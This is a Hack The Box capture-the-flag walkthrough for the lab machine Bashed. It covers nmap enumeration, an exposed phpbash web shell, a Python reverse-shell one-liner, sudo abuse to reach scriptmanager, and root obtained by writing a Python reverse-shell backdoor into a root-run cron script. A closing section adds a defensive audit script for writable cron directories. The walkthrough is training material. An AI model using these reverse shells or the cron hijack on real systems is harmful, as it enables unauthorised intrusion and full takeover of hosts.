
Hack The Box walkthrough – Bashed machine
Today, a new walkthrough of the Hack The Box machine Bashed.
It is an easy Linux machine released in December 2017, made by Arrexel.

Let’s jump in!
ENUMERATION
As usual we start with an nmap scan to find out what we are dealing with today:
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.66.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for 10.129.66.213
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds
It seems only an Apache web service is running, on port 80. Let’s have a look:

It seems to be a site about Arrexel’s dev progress. Nothing interesting so far.
Let’s run a dirbuster scan to see if other pages can be found:


I found interesting files in the dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!
I still prefer a shell through netcat, so I start a listener and call back to it from phpbash:
nc -lvnp 1337
export RHOST="10.10.14.105";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
FOOTHOLD
Running sudo -l, I found out I am able to run any command as scriptmanager with sudo, without a password:
[email protected]:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
With the following command I have been able to spawn a shell as scriptmanager:
[email protected]:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/var/www/html/dev$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
PRIVILEGE ESCALATION
The linpeas enumeration output shows an uncommon folder “scripts” at the root of the filesystem.

There are 2 files inside:
[email protected]:/scripts$ ls -al
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 1039 Dec 13 13:41 test.py
-rw-r--r-- 1 root root 8 Dec 13 15:00 test.txt
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing123!")
f.close
[email protected]:/scripts$ cat test.txt
[email protected]:/scripts$
It appears that the python script is executed by root every minute to rewrite the file test.txt: test.txt is owned by root even though test.py belongs to scriptmanager, and its timestamp keeps changing.
Therefore I edited the script to add a reverse shell:
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing2")
f.close
import socket # For Building TCP Connection
import subprocess # To start the shell in the system
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's'
s.connect(('10.10.14.105', 4242)) # Here we define the Attacker IP and the listening port
while True: # keep receiving commands from the Kali machine
command = s.recv(1024) # read the first KB of the tcp socket
if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop
s.close()
break
else: # otherwise, we pass the received command to a shell process
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() ) # send back the result
s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error
def main ():
connect()
main()
[email protected]:/scripts$
nc -lvnp 1337
Waiting 1 min… then I am root!
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.42.84] 58776
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
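From a defender's point of view, the root cause here is a root cron job that runs a script from a directory a non-root user owns and can write to. The following audit script is an added example and not part of the original walkthrough: it parses an ls -al listing like the one from /scripts above (embedded as a constructed sample) and flags every script, and the directory itself, that a lower-privileged account could modify before root runs it. The script suffixes and the "root owns everything" rule are assumptions of the example, not something the page states.

```python
import re

# Constructed sample: the /scripts listing shown in the walkthrough, pasted as text.
SAMPLE_LISTING = """\
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 1039 Dec 13 13:41 test.py
-rw-r--r-- 1 root root 8 Dec 13 15:00 test.txt
"""

# One `ls -al` line: mode, link count, owner, group, size, three date fields, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

def parse_listing(text):
    """Parse `ls -al` output into dicts with mode, owner, group and name."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries

def writable_by_non_root(entry):
    """List the reasons a non-root account could change this entry."""
    reasons = []
    mode = entry["mode"]          # e.g. "-rw-r--r--": index 5 = group w, index 8 = other w
    if entry["owner"] != "root":  # the owner can always chmod/rewrite the file
        reasons.append("owned by %s" % entry["owner"])
    if mode[5] == "w" and entry["group"] != "root":
        reasons.append("group-writable (%s)" % entry["group"])
    if mode[8] == "w":
        reasons.append("world-writable")
    return reasons

def audit_root_cron_dir(listing, script_suffixes=(".py", ".sh")):
    """Flag scripts root would run from a cron directory that lower-privileged users can modify.
    The '.' entry is checked too: a writable parent directory lets a user replace the file."""
    findings = {}
    for e in parse_listing(listing):
        if e["name"] == "." or e["name"].endswith(script_suffixes):
            reasons = writable_by_non_root(e)
            if reasons:
                findings[e["name"]] = reasons
    return findings

if __name__ == "__main__":
    for name, why in audit_root_cron_dir(SAMPLE_LISTING).items():
        print("%s: %s" % (name, ", ".join(why)))
```

On the sample listing it reports test.py as owned by scriptmanager and the directory as owned by and group-writable for scriptmanager, which is exactly the condition the escalation above relied on; the fix is to have root own the cron-run scripts and their directory with mode 0755 or stricter.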